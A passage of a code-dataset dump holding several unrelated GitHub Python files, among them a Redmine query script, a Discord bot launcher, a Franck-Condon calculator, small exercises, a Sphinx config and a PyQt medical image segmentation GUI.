connected object.\n datatype: What datatype to use to filter the issues.\n build: The BRC build to use to filter.\n\n Returns:\n A list of Redmine issues.\n \"\"\"\n \n other_fields = {\"cf_94\": datatype}\n if build:\n version_id = get_version_id(redmine, build)\n other_fields[\"fixed_version_id\"] = version_id\n\n return list(get_ebi_issues(redmine, other_fields))\n\n\ndef get_version_id(redmine: Redmine, build: int) -> int:\n \"\"\"Given a build number, get the Redmine version id for it.\n\n Args:\n redmine: A Redmine connected object.\n build: The BRC build to use to filter.\n\n Returns:\n The version id from Redmine for that build.\n \"\"\"\n versions = redmine.version.filter(project_id=veupathdb_id)\n version_name = \"Build \" + str(build)\n version_id = [version.id for version in versions if version.name == version_name]\n return version_id\n\n \ndef get_ebi_issues(redmine, other_fields=dict()) -> RedmineResource:\n \"\"\"Get EBI issues from Redmine, add other fields if provided.\n\n Args:\n redmine: A Redmine connected object.\n other_fields: A dict of fields to provide to filter the issues.\n\n Returns:\n A Redmine resource set.\n \"\"\"\n # Other fields replace the keys that already exist in default_fields\n search_fields = {**default_fields, **other_fields}\n \n return redmine.issue.filter(**search_fields)\n \n\ndef main():\n parser = argparse.ArgumentParser(description='Retrieve metadata from Redmine')\n \n parser.add_argument('--key', type=str, required=True,\n help='Redmine authentification key')\n parser.add_argument('--output_dir', type=str, required=True,\n help='Output_dir')\n # Choice\n parser.add_argument('--get', choices=['rnaseq', 'dnaseq'], required=True,\n help='Get rnaseq, or dnaseq issues')\n # Optional\n parser.add_argument('--build', type=int,\n help='Restrict to a given build')\n parser.add_argument('--current_abbrevs', type=str,\n help='File that contains the list of current organism_abbrevs')\n args = parser.parse_args()\n \n # Start Redmine API\n redmine = Redmine(url, key=args.key)\n \n # Choose which data to retrieve\n if args.get == 'rnaseq':\n retrieve_rnaseq_datasets(redmine, args.output_dir, args.build, args.current_abbrevs)\n elif args.get == 'dnaseq':\n # TODO\n # retrieve_dnaseq_datasets(redmine, args.output_dir, args.build, args.current_abbrevs)\n print(\"Not yet implemented\")\n else:\n print(\"Need to say what data you want to --get: rnaseq? dnaseq?\")\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"Ensembl/ensembl-production-imported","sub_path":"scripts/brc4/get_rnaseq_from_redmine.py","file_name":"get_rnaseq_from_redmine.py","file_ext":"py","file_size_in_byte":14026,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"32670336966","text":"import os\nfrom discord.ext import commands\nfrom database import session, Prefixes\nfrom discord import Intents\n\ndef get_prefix(_bot, message):\n try:\n return session.query(Prefixes).filter_by(server_id=message.guild.id).one().prefix\n except:\n return \"!!\"\n\ndef main():\n intents: Intents = Intents.default()\n\n Bot = commands.Bot(command_prefix=get_prefix, intents=intents)\n Bot.remove_command(\"help\")\n\n for f in os.listdir('./cogs'):\n if f.endswith('.py'):\n Bot.load_extension(f'cogs.{f[:-3]}')\n\n token = os.environ['TOKEN']\n\n Bot.run(token)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"Darth-Kylokun/prayer-bot","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":634,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"38828804081","text":"f = open('text_of_program.txt', 'r', encoding='utf-8')\n\narray = [row.strip() for row in f]\nfor i in array:\n if(i == ''):\n array.remove(i) #удалить пробелы\n\nnew_array = []\nfor i in array:\n new_array.append(list(i)) #разбить строки на символы\n\nfor i in range(len(new_array) - 1): #удаление всех string в строках\n start_symbol = False\n for j in range(len(new_array[i]) - 1):\n if (start_symbol == False and new_array[i][j] == '\"'):\n start_symbol = True\n elif (start_symbol == True and new_array[i][j] == '\"'):\n start_symbol = False\n new_array[i][j] = False\n elif (start_symbol == True):\n new_array[i][j] = False\n\ntext_without_string = \"\"\n\nfor i in range(len(new_array)):\n for j in range(len(new_array[i])):\n text_without_string += str(new_array[i][j])\n text_without_string += '\\n'\n\nlines_text_without_string = text_without_string.split('\\n')\n\nnodes_count = 0\nfor i in lines_text_without_string:\n if (len(i) > 1 and i.count('{') == 0 and i.count('}') == 0 and i.count('};') == 0):\n nodes_count += 1\n\nprint('Количество узлов = ', nodes_count)\n\nedge_count = 0\nfor i in lines_text_without_string:\n if (len(i) > 1 and i.count('{') == 0 and i.count('}') == 0 and i.count('};') == 0):\n edge_count += 1\n if (i.count('if') > 0):\n edge_count += 2\n if (i.count('else') > 0):\n edge_count += 1\n if (i.count('for') > 0):\n edge_count += 1\n if (i.count('while') > 0):\n edge_count += 1\n if (i.count('switch') > 0):\n edge_count += 1\n if (i.count('case') > 0):\n edge_count += 1\n\nprint('Количество рёбер = ', edge_count)\n\nV = edge_count - nodes_count + 2\nprint('Метрика Мак-Кейба = ', V)\n\nf.close()","repo_name":"VitasVital/Bachelor_course","sub_path":"4Cours1Sem/Technologies_and_development_standards/Gusev.V.E.09-832_lab_2.py","file_name":"Gusev.V.E.09-832_lab_2.py","file_ext":"py","file_size_in_byte":1852,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"43554768237","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Aug 12 14:50:39 2021\n\nTODO:\n multidimensional;\n Duchinsky rotation;\n\n@author: Bing\n\"\"\"\n\nimport math\n\nfrom math import factorial\nfrom math import sqrt, exp\nfrom scipy.special import hermite, binom\n# import numba\n\ndef dfactortial(n):\n return math.prod(range(n, 0, -2))\n\n# @numba.jit\ndef FranckCondon(Ln, Lm, d):\n '''\n Analytical formula for the Franck-Condon factors from\n\n Chang, J.-L. Journal of Molecular Spectroscopy 232, 102–104 (2005).\n\n Parameters\n ----------\n Ln : TYPE\n DESCRIPTION.\n Lm : TYPE\n DESCRIPTION.\n d : TYPE\n DESCRIPTION.\n\n Returns\n -------\n float\n Franck-Condon overlap.\n\n '''\n\n # If the excited state frequency (Ln[1]) is greater than the ground state\n # frequency (Lm[1]) then we must swap Ln and Lm for the program, but then\n # take the absolute value of the result.\n if (Ln[1] > Lm[1]):\n Ln, Lm = Lm, Ln\n\n n = Ln[0]\n m = Lm[0]\n wn_wavenumbers = Ln[1]\n wm_wavenumbers = Lm[1]\n\n wn = wn_wavenumbers/8065.5/27.2116\n wm = wm_wavenumbers/8065.5/27.2116\n # f = float(wn)/wm\n # w = wm\n\n # The formula is used for (x+d)^2 whereas I use (x-d)^2 for\n # the excited-state surface\n d = -d\n # F is the (massless) force constant for the mode. But which w?\n # F = w ** 2\n\n #convertedQSquared = deltaQ**2/(6.02214*(10**23) * 9.1094*(10**-28))\n # convertedQSquared = deltaQ**2\n\n\n # X is defined as such in Siders, Marcus 1981 Average frequency?\n # X = convertedQSquared / 2\n A = 2. * sqrt(wn * wm)/(wn + wm)\n S = d**2 * wn*wm/(wn + wm)\n\n p = sqrt(A*exp(-S)/(factorial(n) * factorial(m))) / 2.**((n+m)/2)\n\n def I(i,j):\n if (i+j) % 2 == 0:\n K = (i+j)//2\n return dfactortial(i+j-1)/(wn + wm)**K\n else:\n return 0\n\n fc = 0\n for i in range(n+1):\n F = hermite(n-i)\n bn = - wm * sqrt(wn)* d/(wn + wm)\n\n for j in range(m+1):\n\n G = hermite(m-j)\n bm = wn * sqrt(wm) * d/(wn + wm)\n\n fc += binom(n, i) * binom(m, j) * F(bn) * G(bm) * (2*sqrt(wn))**i *\\\n (2*sqrt(wm))**j * I(i, j)\n\n return fc * p\n\n\n\n\n# def genIntensities( deltaE, deltaQ, w_wavenumbers, wprime_wavenumbers):\n# \"\"\" wprime must be greater than w\"\"\"\n# wprime = wprime_wavenumbers/8065.5/27.2116\n# w = w_wavenumbers/8065.5/27.2116\n# intensityFunction = lambda n: (diffFreqOverlap([n, wprime_wavenumbers], [0, w_wavenumbers], deltaQ))**2\n# intensities = map(intensityFunction, range(0,11))\n# return intensities\n\n# def genEnergies(deltaE, w_wavenumbers, wprime_wavenumbers):\n# wprime = wprime_wavenumbers/8065.5/27.2116\n# w = w_wavenumbers/8065.5/27.2116\n# energyFunction = lambda n: (deltaE + (n+0.5)*(wprime) - 0.5*w)\n# energies = map(energyFunction, range(0, 11))\n# return energies\n\n\nif __name__ == '__main__':\n\n fc = FranckCondon([2, 500], [2, 500], 0)\n print(fc)","repo_name":"binggu56/pyqed","sub_path":"pyqed/FranckCondon.py","file_name":"FranckCondon.py","file_ext":"py","file_size_in_byte":2994,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"7"}
+{"seq_id":"72685403104","text":"class RecentCounter:\n\n def __init__(self):\n self.count = 0\n self.requests = []\n\n def ping(self, t: int) -> int:\n in_range_count = 1\n i = 0\n for req in self.requests:\n if t - 3000 <= req <= t:\n in_range_count += 1\n elif req > t:\n break\n i += 1\n self.requests.insert(i, t)\n return in_range_count\n\n\n# Your RecentCounter object will be instantiated and called as such:\n# obj = RecentCounter()\n# param_1 = obj.ping(t)\n\n\n# TLE\n# https://leetcode.com/submissions/detail/403134818/testcase/\n","repo_name":"daviddwlee84/LeetCode","sub_path":"Python3/Design/NumberOfRecentCells/Naive933.py","file_name":"Naive933.py","file_ext":"py","file_size_in_byte":601,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"7"}
+{"seq_id":"7152033944","text":"import random\nimport time\n\nlottery = []\n\nwhile len(lottery) != 6:\n lottery.append(random.randint(1, 45))\n lottery = list(set(lottery))\n\nfor key, value in enumerate(lottery):\n print(\"%d번 숫자\" % (key+1), end=\" \")\n time.sleep(1)\n print(\"%d입니다.\" % value)\n time.sleep(0.5)\n","repo_name":"Meengkko/bigdata_python2019","sub_path":"01_jump_to_python/5_APP/exer2/q13.py","file_name":"q13.py","file_ext":"py","file_size_in_byte":297,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"35018432676","text":"# Configuration file for the Sphinx documentation builder.\n#\n# For the full list of built-in configuration values, see the documentation:\n# https://www.sphinx-doc.org/en/master/usage/configuration.html\n\n# -- Project information -----------------------------------------------------\n# https://www.sphinx-doc.org/en/master/usage/configuration.html#project-information\n\nproject = 'Dummy'\ncopyright = '2022, Ben'\nauthor = 'Ben'\nrelease = '1.0'\n\n# -- General configuration ---------------------------------------------------\n# https://www.sphinx-doc.org/en/master/usage/configuration.html#general-configuration\n\nextensions = [\n\t\"autoapi.extension\",\n\t\"sphinx_rtd_theme\",\n \"myst_parser\",\n]\n\ntemplates_path = ['_templates']\nexclude_patterns = []\n\nautoapi_type = 'python'\nautoapi_dirs = ['../../src']\n\nsource_suffix = {\n \".rst\": \"restructuredtext\",\n \".md\": \"markdown\",\n}\n\nmyst_enable_extensions = [\n \"linkify\", # trun URLs into links automatically\n \"dollarmath\", # support for $..$ and $$..$$ math environments\n \"substitution\", # enable jina2 style substitutions\n \"deflist\", # enable markup for Pandoc style definitions \n \"html_image\", # enable support for HTML image tags\n \"html_admonition\", # enable support for HTML info/warning/tip boxes\n \"colon_fence\", # enable support for colon fence environment, e.g. for figure-md\n]\nmyst_dmath_double_inline = True # enable support for inline $$-blocks \nmyst_heading_anchors = 4 # enable automatic anchor generation down to n-th level headings\n\n# -- Options for HTML output -------------------------------------------------\n# https://www.sphinx-doc.org/en/master/usage/configuration.html#options-for-html-output\n\nhtml_theme = \"sphinx_rtd_theme\"\nhtml_static_path = ['_static']\n","repo_name":"bwulff/dummy_for_myst_parser","sub_path":"doc/source/conf.py","file_name":"conf.py","file_ext":"py","file_size_in_byte":1846,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"4301276804","text":"# This script converts all jpg file in current dir to thumbnail size and save the files in 'thumbnails' folder\n\nfrom PIL import Image\nimport glob\nimport os\n\nsize = 128, 128\n\nif not os.path.exists('thumbnails'):\n os.makedirs('thumbnails')\n\nfor infile in glob.glob(\"*.jpg\"):\n file, ext = os.path.splitext(infile)\n im = Image.open(infile)\n im.thumbnail(size)\n os.chdir('thumbnails')\n im.save(file + \"_thumbnail\" + \".jpg\")\n os.chdir(os.pardir)\n","repo_name":"kamalhisyam/rally-workshop","sub_path":"run3/src/to_thumbnails.py","file_name":"to_thumbnails.py","file_ext":"py","file_size_in_byte":461,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"7973048844","text":"\n\n #2- search\nN =int(input())\nA = input().split()\nM = int(input())\n\ni=0\nfound = False\nfor i in range(len(A)):\n if(int(A[i])==M):\n print(i)\n found = True\n break\nif(found == False):\n print(-1)\n","repo_name":"HusseinAlswasy/Sheet3","sub_path":"Search.py","file_name":"Search.py","file_ext":"py","file_size_in_byte":262,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"42081783568","text":"import sys\r\nimport os\r\nimport zipfile\r\nimport shutil\r\nimport nibabel as nib\r\nimport tarfile\r\nimport os\r\nfrom PIL import Image\r\nimport gzip\r\nimport dicom2nifti\r\nimport meshlib.mrmeshpy as mr\r\nimport meshlib.mrmeshnumpy as mrn\r\nimport cv2\r\nimport numpy as np\r\nimport scipy.signal\r\nimport torch\r\nimport monai\r\nfrom PyQt5 import uic, QtWidgets\r\nfrom PyQt5.QtWidgets import QFileDialog,QMainWindow\r\nfrom PyQt5.QtCore import Qt, QTimer\r\nfrom PyQt5 import QtGui\r\nfrom interfaz_acsi_choose import Ui_segunda_ventana\r\nfrom interfaz_acsi_info import Ui_tercera_ventana\r\nfrom PyQt5.uic import loadUi\r\n\r\nfrom datetime import datetime\r\nimport tempfile\r\nfrom glob import glob\r\nfrom torch.utils.data import random_split, DataLoader\r\nimport torchio as tio\r\nimport pytorch_lightning as pl\r\nimport matplotlib.pyplot as plt\r\nimport seaborn as sns\r\n\r\n# !pip install -q monai==1.1.0\r\n# !pip install -q torch==1.10.2 torchtext torchvision\r\n# !pip install -q torchio==0.18.73\r\n# !pip install -q pytorch-lightning==1.5.10\r\n# !pip install -q pandas==1.1.5 seaborn==0.11.1\r\n\r\n# Cargar la interfaz de usuario desde el archivo .ui\r\nqtCreatorFile = \"interfaz_acsi.ui\"\r\nUi_MainWindow, QtBaseClass = uic.loadUiType(qtCreatorFile)\r\n\r\nclass Model(pl.LightningModule):\r\n def __init__(self, net, criterion, learning_rate, optimizer_class):\r\n super().__init__()\r\n self.lr = learning_rate\r\n self.net = net\r\n self.criterion = criterion\r\n self.optimizer_class = optimizer_class\r\n \r\n def configure_optimizers(self):\r\n optimizer = self.optimizer_class(self.parameters(), lr=self.lr)\r\n return optimizer\r\n \r\n def prepare_batch(self, batch):\r\n return batch['image'][tio.DATA], batch['label'][tio.DATA]\r\n \r\n def infer_batch(self, batch):\r\n x, y = self.prepare_batch(batch)\r\n y_hat = self.net(x)\r\n return y_hat, y\r\n\r\n def training_step(self, batch, batch_idx):\r\n y_hat, y = self.infer_batch(batch)\r\n loss = self.criterion(y_hat, y)\r\n self.log('train_loss', loss, prog_bar=True)\r\n return loss\r\n \r\n def validation_step(self, batch, batch_idx):\r\n y_hat, y = self.infer_batch(batch)\r\n loss = self.criterion(y_hat, y)\r\n self.log('val_loss', loss)\r\n return loss\r\n \r\n def forward(self, x):\r\n # Pasar la entrada a través de la red\r\n return self.net(x)\r\n \r\nunet = monai.networks.nets.UNet(\r\n dimensions=3,\r\n in_channels=1,\r\n out_channels=3,\r\n channels=(8, 16, 32, 64),\r\n strides=(2, 2, 2),\r\n)\r\n\r\ndevice = 'cuda' if torch.cuda.is_available() else 'cpu'\r\n\r\n# Define el modelo (asegúrate de que sea la misma arquitectura que se usó para entrenar)\r\nmodel = Model(\r\n net=unet,\r\n criterion=monai.losses.DiceCELoss(softmax=True),\r\n learning_rate=1e-2,\r\n optimizer_class=torch.optim.AdamW,\r\n)\r\n\r\n# Cargar los pesos del modelo\r\nmodel_path = 'model_weights.pth'\r\nmodel.load_state_dict(torch.load(model_path, map_location=torch.device('cpu')))\r\n\r\n# Poner el modelo en modo de evaluación\r\nmodel.eval()\r\n\r\n\r\nclass MyApp(QMainWindow, Ui_MainWindow):\r\n def __init__(self):\r\n super(MyApp, self).__init__()\r\n self.setupUi(self)\r\n self.setWindowTitle(\"Proyecto ACSI\")\r\n self.logo_upch.setPixmap(QtGui.QPixmap(\"upch_logo.png\"))\r\n self.logo_pucp.setPixmap(QtGui.QPixmap(\"pucp_logo.png\"))\r\n icon = QtGui.QIcon()\r\n icon.addPixmap(QtGui.QPixmap(\"upch_logo.png\"), QtGui.QIcon.Normal, QtGui.QIcon.Off)\r\n self.setFixedSize(705, 591)\r\n self.ventana_sec = Ventana_dos(parent=self)\r\n self.ventana_third = Ventana_tres(parent=self)\r\n # Conectar los botones a las funciones correspondientes\r\n self.load_file.activated.connect(self.agregar_carpeta)\r\n self.start_op.clicked.connect(self.inicio_tarea)\r\n self.save_file.clicked.connect(self.guardar_carpeta)\r\n self.timer = QTimer(self)\r\n self.timer.timeout.connect(self.play_next_image)\r\n \r\n self.next_both.clicked.connect(self.next_both_graphs)\r\n self.back_both.clicked.connect(self.back_both_graphs)\r\n self.stop_both.clicked.connect(self.stop_both_graphs)\r\n self.play_both.clicked.connect(self.play_both_graphs)\r\n self.choose.clicked.connect(self.choose_graph)\r\n self.button_info.clicked.connect(self.show_info)\r\n\r\n def show_info(self):\r\n try:\r\n self.ventana_third.show() \r\n except Exception as e:\r\n print(f\"Error: {e}\")\r\n\r\n def choose_graph(self):\r\n try:\r\n self.ventana_sec.show()\r\n except Exception as e:\r\n print(f\"Error: {e}\")\r\n\r\n def recibir_new_frame(self, new_i_frame):\r\n try:\r\n self.index_orig=new_i_frame\r\n self.graph_1.setPixmap(QtGui.QPixmap(str(self.rutas_frame_orig[new_i_frame])))\r\n self.graph_2.setPixmap(QtGui.QPixmap(str(self.rutas_frame_seg[new_i_frame])))\r\n self.t_frame.setText(str(new_i_frame))\r\n except Exception as e:\r\n print(f\"Error: {e}\")\r\n \r\n def play_both_graphs(self):\r\n if not self.rutas_frame_orig == [] and not self.rutas_frame_seg == []:\r\n self.index_orig = 0\r\n self.index_orig = 0\r\n self.timer.start(60) # Iniciar el QTimer para las imágenes originales\r\n\r\n def next_both_graphs(self):\r\n if not self.rutas_frame_orig == [] and not self.rutas_frame_seg == []:\r\n if self.index_orig < len(self.rutas_frame_orig) - 1:\r\n self.index_orig += 1\r\n self.graph_1.setPixmap(QtGui.QPixmap(str(self.rutas_frame_orig[self.index_orig])))\r\n self.t_frame.setText(str(self.index_orig))\r\n if self.index_orig < len(self.rutas_frame_seg) - 1:\r\n self.index_orig += 1\r\n self.graph_2.setPixmap(QtGui.QPixmap(str(self.rutas_frame_seg[self.index_orig])))\r\n self.t_frame.setText(str(self.index_orig))\r\n\r\n def back_both_graphs(self):\r\n if not self.rutas_frame_orig == [] and not self.rutas_frame_seg == []:\r\n if self.index_orig > 0:\r\n self.index_orig -= 1\r\n self.graph_1.setPixmap(QtGui.QPixmap(str(self.rutas_frame_orig[self.index_orig])))\r\n self.t_frame.setText(str(self.index_orig))\r\n if self.index_orig > 0:\r\n self.index_orig -= 1\r\n self.graph_2.setPixmap(QtGui.QPixmap(str(self.rutas_frame_seg[self.index_orig])))\r\n self.t_frame.setText(str(self.index_orig))\r\n\r\n\r\n def stop_both_graphs(self):\r\n try:\r\n self.timer.stop() # Detener el QTimer\r\n self.t_frame.setText(str(self.index_orig))\r\n except Exception as e:\r\n print(f\"Error: {e}\")\r\n\r\n def play_next_image(self):\r\n try:\r\n # Actualizar frames de la imagen original\r\n if self.index_orig < len(self.rutas_frame_orig):\r\n self.graph_1.setPixmap(QtGui.QPixmap(str(self.rutas_frame_orig[self.index_orig])))\r\n self.index_orig += 1\r\n else:\r\n self.index_orig = 0 # Reiniciar el índice si ha llegado al final\r\n\r\n # Actualizar frames de la imagen segmentada\r\n if self.index_orig < len(self.rutas_frame_seg):\r\n self.graph_2.setPixmap(QtGui.QPixmap(str(self.rutas_frame_seg[self.index_orig])))\r\n self.index_orig += 1\r\n else:\r\n self.index_orig = 0 # Reiniciar el índice si ha llegado al final\r\n\r\n self.t_frame.setText(str(self.index_orig)) # Actualizar el texto del frame\r\n\r\n except Exception as e:\r\n print(f\"Error: {e}\")\r\n\r\n \r\n def agregar_carpeta(self):\r\n try:\r\n texto=self.load_file.currentText()\r\n escritorio = os.path.expanduser(\"~/Desktop\")\r\n self.contenido_carpetas={}\r\n \r\n if texto == \"Cargar NIfTI\":\r\n archivo_nii_gz, _ = QFileDialog.getOpenFileName(self, \"Seleccionar Archivo NIfTI\", escritorio, filter=\"Archivos NIfTI (*.nii.gz)\")\r\n if not archivo_nii_gz:\r\n return # El usuario canceló la selección o no eligió un archivo NIfTI\r\n\r\n self.ruta_completa = archivo_nii_gz\r\n self.ruta_salida_nift = os.path.dirname(archivo_nii_gz)\r\n print(f\"Archivo seleccionado: {archivo_nii_gz}\")\r\n self.ruta_completa = archivo_nii_gz\r\n imagen_nii = nib.load(self.ruta_completa)\r\n self.datos = imagen_nii.get_fdata()\r\n print(self.datos.shape)\r\n self.flag_zip = 0\r\n self.mostrar_frames_graph_1(self.datos, self.flag_zip)\r\n\r\n # elif texto == \"Cargar archivo ZIP\":\r\n # archivo_zip, _ = QFileDialog.getOpenFileName(self, \"Seleccionar Archivo ZIP\", escritorio, filter=\"Archivos ZIP (*.zip)\")\r\n # self.flag_zip=1\r\n # if not archivo_zip:\r\n # return # El usuario canceló la selección o no eligió un archivo ZIP\r\n # # Abre el archivo ZIP en modo de lectura\r\n # self.directorio_destino = os.path.dirname(archivo_zip)\r\n # self.nombre_del_archivo = os.path.basename(archivo_zip)\r\n # new_archivo_zip, extension = os.path.splitext(archivo_zip)\r\n # if os.path.exists(new_archivo_zip):\r\n # # Si la carpeta existe, elimínala junto con su contenido\r\n # shutil.rmtree(new_archivo_zip)\r\n # os.mkdir(new_archivo_zip)\r\n # self.nombre_aux=os.path.basename(new_archivo_zip)\r\n # print(new_archivo_zip)\r\n # with zipfile.ZipFile(archivo_zip, 'r') as zip_ref:\r\n # zip_ref.extractall(new_archivo_zip)\r\n # print(f\"Se seleccionó una carpeta: {new_archivo_zip}\")\r\n # lista_de_archivos = zip_ref.namelist()\r\n # ruta_carpeta = os.path.join(new_archivo_zip, lista_de_archivos[0])\r\n # ruta_carpeta = ruta_carpeta.replace('\\\\', '/')\r\n # ruta_carpeta = ruta_carpeta[:-1]\r\n # print(f\"ruta:{ruta_carpeta}\")\r\n # self.nombre_aux=os.path.basename(ruta_carpeta)\r\n # print(f\"nombre_aux:{self.nombre_aux}\")\r\n # lista_de_archivos.pop(0)\r\n # print(f\"nombre: {lista_de_archivos}\")\r\n # self.ruta_salida_nift_1 = os.path.dirname(ruta_carpeta)\r\n # print(f\"ruta_salida_nift_1: {self.ruta_salida_nift_1}\") \r\n # self.ruta_salida_nift = os.path.join(self.ruta_salida_nift_1, str(self.nombre_aux)+str(\"_nii_gz\"))\r\n # self.ruta_salida_nift=self.ruta_salida_nift.replace('\\\\', '/')\r\n # print(self.ruta_salida_nift)\r\n # os.makedirs(self.ruta_salida_nift, exist_ok=True)\r\n # dicom2nifti.convert_directory(ruta_carpeta, self.ruta_salida_nift, compression=True, reorient=True)\r\n\r\n # nombre_archivo_generado = os.listdir(self.ruta_salida_nift)[0] # Suponiendo que solo haya un archivo\r\n # # Renombra el archivo generado a tu nombre personalizado\r\n # nombre_personalizado = str(self.nombre_aux)+str(\"_nii_gz.nii.gz\")\r\n # print(f\"nombre_f:{nombre_personalizado}\")\r\n # nueva_ruta_archivo = os.path.join(self.ruta_salida_nift, nombre_personalizado)\r\n # os.rename(os.path.join(self.ruta_salida_nift, nombre_archivo_generado), nueva_ruta_archivo)\r\n \r\n # archivo_ni_gz = os.listdir(self.ruta_salida_nift)\r\n # ruta_completa = os.path.join(self.ruta_salida_nift, archivo_ni_gz[0])\r\n # self.ruta_completa = ruta_completa.replace('\\\\', '/')\r\n # print(f\"Ruta_nift:{self.ruta_completa}\")\r\n # # Cargar el archivo NIfTI\r\n # imagen_nii = nib.load(self.ruta_completa)\r\n # # Acceder a los datos de la imagen (esto puede variar según tus necesidades)\r\n # self.datos = imagen_nii.get_fdata()\r\n # print(self.datos.shape)\r\n # self.mostrar_frames_graph_1(self.datos,self.flag_zip)\r\n\r\n elif texto == \"Cargar DICOM\":\r\n archivo_tar, _ = QFileDialog.getOpenFileName(self, \"Seleccionar Archivo TAR\", escritorio, filter=\"Archivos TAR (*.tar.gz *.tar)\")\r\n self.flag_zip=1\r\n if not archivo_tar:\r\n return # El usuario canceló la selección o no eligió un archivo ZIP\r\n # Abre el archivo TAR en modo de lectura\r\n self.directorio_destino = os.path.dirname(archivo_tar)\r\n self.nombre_del_archivo = os.path.basename(archivo_tar) \r\n archivo_tar, extension = os.path.splitext(archivo_tar)\r\n if os.path.exists(archivo_tar):\r\n # Si la carpeta existe, elimínala junto con su contenido\r\n shutil.rmtree(archivo_tar)\r\n os.mkdir(archivo_tar)\r\n self.nombre_aux=os.path.basename(archivo_tar)\r\n new_archivo_tar=os.path.join(self.directorio_destino, self.nombre_del_archivo)\r\n new_archivo_tar = new_archivo_tar.replace('\\\\', '/')\r\n \r\n shutil.unpack_archive(new_archivo_tar, extract_dir=archivo_tar)\r\n with tarfile.open(new_archivo_tar, 'r') as tar:\r\n # Obtiene la lista de nombres de archivos en el archivo tar\r\n lista_de_archivos = tar.getnames()\r\n print(f\"Se seleccionó una carpeta: {new_archivo_tar}\")\r\n ruta_carpeta = os.path.join(archivo_tar, lista_de_archivos[0])\r\n ruta_carpeta = ruta_carpeta.replace('\\\\', '/')\r\n print(f\"Ruta: {ruta_carpeta}\")\r\n lista_de_archivos.pop(0)\r\n print(f\"nombre: {lista_de_archivos}\")\r\n self.nombre_aux=os.path.basename(ruta_carpeta)\r\n self.ruta_salida_nift_1 = os.path.dirname(ruta_carpeta)\r\n self.ruta_salida_nift = os.path.join(self.ruta_salida_nift_1, str(self.nombre_aux)+str(\"_nii_gz\"))\r\n self.ruta_salida_nift=self.ruta_salida_nift.replace('\\\\', '/')\r\n print(self.ruta_salida_nift)\r\n os.makedirs(self.ruta_salida_nift, exist_ok=True)\r\n dicom2nifti.convert_directory(ruta_carpeta, self.ruta_salida_nift, compression=True, reorient=True)\r\n\r\n nombre_archivo_generado = os.listdir(self.ruta_salida_nift)[0] # Suponiendo que solo haya un archivo\r\n # Renombra el archivo generado a tu nombre personalizado\r\n nombre_personalizado = str(self.nombre_aux)+str(\"_nii_gz.nii.gz\")\r\n nueva_ruta_archivo = os.path.join(self.ruta_salida_nift, nombre_personalizado)\r\n os.rename(os.path.join(self.ruta_salida_nift, nombre_archivo_generado), nueva_ruta_archivo)\r\n\r\n archivo_ni_gz = os.listdir(self.ruta_salida_nift)\r\n ruta_completa = os.path.join(self.ruta_salida_nift, archivo_ni_gz[0])\r\n self.ruta_completa = ruta_completa.replace('\\\\', '/')\r\n print(f\"Ruta_nift:{self.ruta_completa}\")\r\n # Cargar el archivo NIfTI\r\n imagen_nii = nib.load(self.ruta_completa)\r\n # Acceder a los datos de la imagen (esto puede variar según tus necesidades)\r\n self.datos = imagen_nii.get_fdata()\r\n print(self.datos.shape)\r\n self.mostrar_frames_graph_1(self.datos,self.flag_zip)\r\n except Exception as e:\r\n print(f\"Error al mostrar las imágenes: {e}\") \r\n \r\n def mostrar_frames_graph_1(self, contenido_carpetas, flag_zip):\r\n try:\r\n ########Colocar el procesamiento para obtener frames en 2D########\r\n self.images_orig=contenido_carpetas\r\n # Crear una lista para almacenar las rutas\r\n self.rutas_frame_orig = []\r\n self.index_orig=0\r\n self.ruta_slices = os.path.join(os.path.dirname(self.ruta_salida_nift), \"aux_slices\")\r\n self.ruta_slices = self.ruta_slices.replace('\\\\', '/')\r\n print(f\"dir_ruta_slices:{self.ruta_slices}\")\r\n os.makedirs(self.ruta_slices, exist_ok=True)\r\n for i, imagen_2d in enumerate(contenido_carpetas[1,1,:]):\r\n # Convierte la imagen 2D en formato CV_8U (8 bits sin signo) para OpenCV\r\n imagen_2d = np.uint8(contenido_carpetas[:,:,i])\r\n # Define el nombre del archivo de imagen\r\n nombre_archivo = f\"imagen_{i}.png\"\r\n # Ruta completa del archivo de imagen\r\n ruta_archivo = os.path.join(self.ruta_slices, nombre_archivo)\r\n # Guarda la imagen como archivo\r\n cv2.imwrite(ruta_archivo, imagen_2d)\r\n # Agrega la ruta del archivo a la lista\r\n self.rutas_frame_orig.append(ruta_archivo)\r\n print(i)\r\n print(f\"Se han guardado {len(self.rutas_frame_orig)} imágenes en {self.ruta_slices}\")\r\n self.graph_1.setPixmap(QtGui.QPixmap(str(self.rutas_frame_orig[self.index_orig])))\r\n self.t_frame.setText(str(self.index_orig))\r\n except Exception as e:\r\n print(f\"Error al mostrar las imágenes: {e}\")\r\n\r\n def inicio_tarea(self):\r\n try:\r\n print(\"Iniciando segmentación...\")\r\n self.segmentacion()\r\n self.mostrar_frames_graph_2()\r\n except Exception as e:\r\n print(f\"Error en inicio_tarea: {e}\")\r\n\r\n \r\n def get_preprocessing_transform(self):\r\n return tio.Compose([\r\n tio.RescaleIntensity((-1, 1)), # Reemplaza target_size con el tamaño deseado\r\n tio.EnsureShapeMultiple(8), # Para U-Net\r\n tio.OneHot(),\r\n ])\r\n def convertir_a_stl(self, mask_array, predictions_folder):\r\n # Debes asegurarte de que 'mask_array' es una matriz 3D que representa tu segmentación\r\n # Si 'mask_array' no es 3D, necesitarás ajustarlo\r\n\r\n # Convertir la matriz 3D a SimpleVolume\r\n simpleVolume = 